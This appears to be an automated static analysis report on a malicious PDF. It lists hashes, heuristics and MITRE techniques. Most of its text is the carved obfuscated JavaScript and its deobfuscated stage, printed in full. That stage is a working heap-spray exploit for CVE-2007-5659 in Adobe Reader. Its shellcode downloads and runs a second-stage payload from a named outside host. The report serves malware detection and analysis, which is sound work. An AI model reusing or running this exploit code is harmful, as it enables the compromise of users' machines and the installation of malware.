Malicious PDF — malware analysis report

Static analysis result for SHA-256 7dc0e31f448d55ed…

MALICIOUS

PDF

4.6 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2013-06-28
MD5: 753da987e8189fcdcda41cb361257e40 SHA-1: 9da563135e0d03f1633e6135fbb7de7b06b7db98 SHA-256: 7dc0e31f448d55edd23000d6c4a390897701b177719844bfca1916da4c40da92
308 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download and execute a second-stage payload from the URL http://google-moogle.net/fiesta/load.php?id=30417&spl=4. The ML classifier strongly indicates maliciousness, and the exploit cluster confirms the presence of exploit code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function GZuRuOwqunt1C4(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function hp5mDtMJ(tGHgeUqSVLKUG){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(tGHgeUqSVLKUG)"+";"+"}");eval("function xPOI4(NbdYxpqBQqN1s){var O2i9v="+"0,h6SXAprtdPi=NbdYxpqBQqN1s.l"+"en"+"gth,y7wr5lSiKQXAb=10"+"2"+"4,hzyuF,GhBAX35ARmpGtl,sXags1D4cB5b0z='',lzYyA72EHS27=O2i9v,isqtQQZIRnL4yP=O2i9v,uPWvO6=O2i9v,XBunSNoZ7k=Ar"+"ra"+"y(63,40 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://google-moogle.net/fiesta/load.php?id=30417&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36C 6235 bytes
SHA-256: ebb6d73df0274234c5ef5b15ce0fa08e03cffd1a78a86dd4426f41805917a14c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 125 of 226 identifiers look randomly generated (e.g. 'uVKfYWDx_2K5j3DxuVa5jVDx_WHnW2Dx_WHM'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function GZuRuOwqunt1C4(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function hp5mDtMJ(tGHgeUqSVLKUG){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(tGHgeUqSVLKUG)"+";"+"}");eval("function xPOI4(NbdYxpqBQqN1s){var O2i9v="+"0,h6SXAprtdPi=NbdYxpqBQqN1s.l"+"en"+"gth,y7wr5lSiKQXAb=10"+"2"+"4,hzyuF,GhBAX35ARmpGtl,sXags1D4cB5b0z='',lzYyA72EHS27=O2i9v,isqtQQZIRnL4yP=O2i9v,uPWvO6=O2i9v,XBunSNoZ7k=Ar"+"ra"+"y(63,40,36,58,50,14,13,26,33,16,0,0,0,0,0,0,30,54,8,25,55,44,28,23,38,43,39,22,17,11,37,5,60,7,59,24,15,4,56,57,49,62,2,0,0,0,0,10,0,20,45,32,12,41,6,1,18,34,46,29,61,51,3,9,27,35,0,47,19,42,52,53,31,21,48);f"+"o"+"r(GhBAX35ARmpGtl=M"+"at"+"h.c"+"ei"+"l(h6SXAprtdPi/"+"y7wr5lSiKQXAb)"+";GhBAX35ARmpGtl>O2i9v;GhBAX35ARmpGtl-"+"-){fo"+"r(hzyuF=Ma"+"th.m"+"in(h6SXAprtdPi,y7wr5lSiKQXAb);hzyuF>O2i9v;hzyuF-"+"-,h6SXAprtdPi-"+"-){uPWvO6|"+"=(XBunSNoZ7k[NbdYxpqBQqN1s.cha"+"rCod"+"eAt(lzYyA72EHS27+"+"+)-48])<"+"<isqtQQZIRnL4yP;if(isqtQQZIRnL4yP){sXags1D4cB5b0z+"+"=hp5mDtMJ"+"(210^uPWvO6&"+"2"+"5"+"5);uPWvO6>"+">="+"8;isqtQQZIRnL4yP-"+"="+"2;}el"+"se{isqtQQZIRnL4yP="+"6"+";}}"+"}return (sXags1D4cB5b0z);}var RdrNDAo1VsyvX7=implode('',['4t3Ec_','x','c','rh_2C7','M2','V53i3_0R','4mRbN_02cZ','3EIu0YeMTbJ4pEHjpsP_08k@uWp','@VuWusJ','w','hC','NQ','_','@Nw3sP','YjWbS7B','uN@R','Y4JuPNuRjY','@IP3RCbaK','W8iGCbP','RRbPKIe3iTVjRRHDie81K3','bRJuJ','whCNQ_@Nw_xYs','Ms','Jwh','CNQ_@Nw','HYI4RCbaKW8i','GCb40jP@','KMNy@1V','yKM08@_E87_1','R4pb3Mj0YjWbS7BuN@p0csx34n3b','H','@_1P_sJ','wh','CNQ_@Nw','HjPs_TbJ4','pEHjp','sP_0uK51VMARW','XuYimZuYRMxu','4t3','Ec','_sJ','M7C280e8R5M1c','x','W2','Q_0R4M','juiQI','VX_@','EiQp34','t3E','c_','x2itue','xY','ePsM','0e','P@p','1X5I1DuT','PD','xuW8','p@VDx','uW8p@VDxuW8p','@','V','DxuV','a@','o2D','x7V8x5','2D','x_','W2Q','W3','Dxu3in','W','3D','xu3i','MYVDx3Naf','@VDx3','Nc','p@VDx3','N9hW','2Dx3NuMY','WD','x','_Na@C2Dx_Naho','NDxu39K5','N','DxuNa7','Y','NDx3Na@oN','Dx','_WHx','oNDx3N8ToNDx33ahjWDxuWc','tCVDx33ahjWD','x_','WG@','CWD','x3Na','_@VDx3Na@o2Dx','_','WH','xoNDx_2IM@VD','x','_Wq','I@WDx3N','qTWVDxuVNM@VDx','3Na5YV','Dx3Na@oNDx','32th5WDx_','2Ixo2Dx7','WNI@W','Dx_','WJTYVDxuV','NxWVDx3N','a55ND','x3Na@oNDx','32','th5W','Dx_2IxCWDx72tu@WDx3Vix5NDxuVN','n','jNDx3Na_jNDx3Na@oNDx32th5WDx_2IxCVD','xu','V','iI@','WDxuV','aZY','V','Dx','uVNI5NDx3Na','f','52Dx3Na@oN','Dx32th5WDx_2Ito','NDx_VGu@WDxuVtj5WDxuVNx@','WDx3NaZ','Y3Dx3Na@oN','D','x32th','5WDx32ah','o2DxuNNt5NDx33','t','Z@2Dx','_W2TYWD','x_','NNTW2','D','x3NuM5WDx3Na','@WNDx_2q','xoND','x','3','3th5','WDx','_WHQ','o2Dx3','N95','W2Dx3NGuYWDx_WHnoWDx_NN','nW2Dxu','VNnW3Dx3Nah','jW','Dx3','Na@o','NDxu3','NnoNDx_NJpW','3Dx33afe','V','Dx7W','uM@','WDx3Na@oN','Dx_W2','xoN','Dx_N8','TW2Dx_VthjWDx_Va','h@2Dx_W','2n','oNDx72a5W','2Dx3ViI','@WDx3Na@oNDx_2a@oND','x32thjW','Dxu3Jto2Dx_2','2x','eNDx_','2thjWD','xuVNtCWDx3','NauYN','Dx3Na@oNDx3','2t@C2Dx_VuQoNDx_28xoNDx72q','sYVDx_VuIY2Dx3N95oNDx','u3tj@WDx3Na@oNDx33t','5jVDx_WHQoNDx3N8TW2Dx3NGuY','WDx_WHn','oWDx_N','NnW2','Dx32a','_@WDx3Na@oN','Dxu3JxoN','Dx_2Nxe3Dx32t@C2DxuNLfo2','Dx_2LfjWDx','3Vi','nC2Dx7','2a','j','Y2Dx','_2LZoNDx32','thjWDxu3JtCV','Dx_','22xW2Dx_2thjWDx','uVNtCW','Dx','3Naf','C2Dx3Na@','oNDx3','Nau','Y','WDx33t5jVDx_W','HQoNDx3NNTW2D','x','3NKuYWDx_W','HnoWDx_NN','nW2Dx_N','a_@WDx','3Na@','oND','xu3J','xoNDx','_','WHTjVDx_Na5W2Dx3NGuYWDx_WH','n','oWDx_NNn','W2Dx3Na_@WDx3','Na','@','oNDx32','G@oNDx_','2KZeWDx','uVG','@C2DxuVG@C2DxuVG','@C','2DxuVG@C2DxuV','8','t@2','Dx_2Jxo2Dx_WHnC','2Dx','uVKfYWDx_2K5j3DxuVa5jVDx_WHnW2Dx_WHM@VDx3NNs5VDx_','2','ctjWDx','_2IxCVDx33LhjWDx_WHpCVDx_Nqs52Dx3NLj@WDx','_2IT','@2Dx33It','jWD','x','3N','LfoND','xuNL5@2Dx322','n5WDxuW','cTWNDx_VL@C2','Dxu','NLZW3Dx3','NiTY3Dx','_Na@YVD','x3V','K7WW','Dx3','NNs','52Dx_VqnYNDx3NL','@oVDx32','a5jNDx3VG_','jWDx3','Vq','p','eWDx','33t','Z','WVD','x','_2JMY','2DxuVHtjWD','x_2JtjWDx3NLfo','2Dxu3','IQ5VDx','3N8tjWDx_WH','TeWDx_N8','n','WWD','x7','VcxC2Dx3N9','hjWD','x3NLhjWDx_2','qnY','2Dx_VKZo','VDx3Na','@CWDx3V9_@W','Dx3ViTYVD','x_2t5j','V','D','x328neNDx','32iToVDx','3N','a5WV','Dx7W','Htj3Dx7WiGj','W','Dx_Va','fY2Dx_WNn5N','Dx_W','ah5','NDx_WLh@WDx_VKhYWDx_','WahjNDx_WNt5NDx_WJt@2Dx_WGZY','NDx7WHt','YW','Dx_W','2n5ND','x_WJtY3Dx7W','H','G','@VDx_V','ahYVDx','_Wah@','2Dx','_','WHtY','VDx','7W','inYN','D','x7W','itj3','D','x_WIQ','5NDx7','VKhjWDx7ViQ@VDx7V','qQjW','Dx_','V2Q@WDx7W','iG@V','Dx7V','Kh@2DxuViQjWzsx34t3Ec_s1gApEff5sI','KW','euQePsMsVu','7jViM','jViJjP25M14tWic5','Bj','1j_Vv','_0','R4QeV273Jx4ssD4pbHuIPVMT','VeMTemZuPYjWbS','7BuN@','IPsMs1gApEff','5','sIKWeuQeP','0MsYajB1niMuIZ5bW','Mj','u','8IYYe','MTemZuP@KMNy@1Vy','KIPsM0e','P','@p1X5','I1','DuTPDx33i','sjVD','x3','3isjVzsx34RCba','KW8i','GCb40jPQA','WeHsW8IHIY@','K','MNy','@1VyKI0','4','RRHDie','81K3b','RJjP25M14','GMH9f_','2g_','0R4I','sJM7C280e8R5M1cxW2Q','_0','0','4Mj','uHMjV','iMjV','RDs1g','ApEf','f5sIK','W','eu','QC34t','psc_sY25','M14RW2u','IV','HwjjVD','@jjcuCjsM@3@5e3_jCbIMYbJIM17HIRwio28ZCce','RW2','u','IV','H','w','jjVD@jjcuCjWJ','0Y4','JuPgZBe9Heb9','iR1Mupi@','5e3_jC','bI','MYbJ','IM17HRq40jP@','KMNy@1V','yK','IPW','Mx2ituexYC340uPs_TbJ4pEHjpsP','_TEG','KYNq5p','N','D','j1Y','RMxu','4t','3Ec_sbwiR','J','9u','eNz5@24','0jPm_u1Pt3jDK3','bchVbcf3jl4M0HApc','HZ3jPK','IYRJjPAKMjx','ZeHKZRVL_0','R4','pp','b','VYo277oEq','Qo0c@I1Y5pEDux05','7C0w3','TPz','sx','34t3Ec_','x18h','p2L_','0R4mRb','N_02cZ3E','I','usbwiRJ9','ueNz5@2','PQIjmZ32HusVR','Rs','bwiR','J9ue','N','z5@2','P','QIjmZ32Hu0VRRsbwiRJ','9ueNz5@','2PQ','IjmZ','32HuT','VRsx34sMb4I','sY8f_bLfCi','i01P','s','0jPuMTlv','Ms','Y','3','Q71vfC2o5Yq40YR4TjP','vtsP','8f_','bLfCic01PjMTVRMsIj_x','18','hp2LHV','VT_sR4TYYRMsIj_','sY8f_bLfCii01P','s0jPNMTlvMx1','8hp2LHV','VT_sR4TYY4Ru','I','4I','x18h','p2LH1VT','_sR4GYYRMxu','4su','Nn_Yil@@EusVEc','u0YeMTemZuPX4CHR','4','IPsM0eP@','p1X5I','1DuT','PD','xuV','X_@EDxuV','X','_@Ezsx34GujR3','Rb3QMJCjM','sPR','RbP','KIe3_sR4pj','WIx5','VRMxE','FHWjP_','xYsMxEFH','W','jPHjP','Hu','Rj84xE','l3IsmZpc','HAM','1','D_0R4QCsY3','REz4xEl3I','sDfIeG','YRER3','RHPh','ps3J71','JZMj1MTP','zR','0s8KM34','QMJCjMssj','x','340uPs_','TE','G','KYNq5pNDj1Y','RJ5']);");eval(xPOI4(RdrNDAo1VsyvX7));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x36C 2564 bytes
SHA-256: 4217ef15da7b1b15436e0ce85905001761d5b63f8c823f0d588a776939e41108
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var SRvBKdBjqYh = new Array(); function UOu4IUyk(LgFGU0Gg, lIeJTzwe) { while (LgFGU0Gg.length*2<lIeJTzwe){LgFGU0Gg += LgFGU0Gg;} LgFGU0Gg = LgFGU0Gg.substring(0,lIeJTzwe/2); return LgFGU0Gg; } function yDQ0Yo5c8Yar() { var LYDC3MTiar2EAU = 0x0c0c0c0c; var C0vtMM = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6F6D%u676F%u656C%u6E2E%u7465%u662F%u6569%u7473%u2F61%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3033%u3134%u2637%u7073%u3D6C%u0034"); var pSocT3nyGu8C = 0x400000; var FYrQjzy2f = C0vtMM.length * 2; var lIeJTzwe = pSocT3nyGu8C - (FYrQjzy2f+0x38); var LgFGU0Gg = unescape("%u9090%u9090"); LgFGU0Gg = UOu4IUyk(LgFGU0Gg, lIeJTzwe); var gJBsBS = (LYDC3MTiar2EAU - 0x400000)/pSocT3nyGu8C; for (var LA8XIg90e5hrHk=0;LA8XIg90e5hrHk<gJBsBS;LA8XIg90e5hrHk++) { SRvBKdBjqYh[LA8XIg90e5hrHk] = LgFGU0Gg + C0vtMM; } } function bE7EqaGeY() { var dgjMBHDb1C = app.viewerVersion.toString(); dgjMBHDb1C = dgjMBHDb1C.replace(/\D/g,""); var ssfCC = new Array(dgjMBHDb1C.charAt(0),dgjMBHDb1C.charAt(1),dgjMBHDb1C.charAt(2)); if ((ssfCC[0] == 8 && ((ssfCC[1] == 1 && ssfCC[2] < 2) || ssfCC[1] < 1)) || (ssfCC[0] == 7 && ssfCC[1] < 1) || (ssfCC[0] < 7)) { yDQ0Yo5c8Yar(); var cNKin = unescape("%u0c0c%u0c0c"); while(cNKin.length < 44952) cNKin += cNKin; this.collabStore = Collab.collectEmailInfo({subj: "",msg: cNKin}); } } bE7EqaGeY();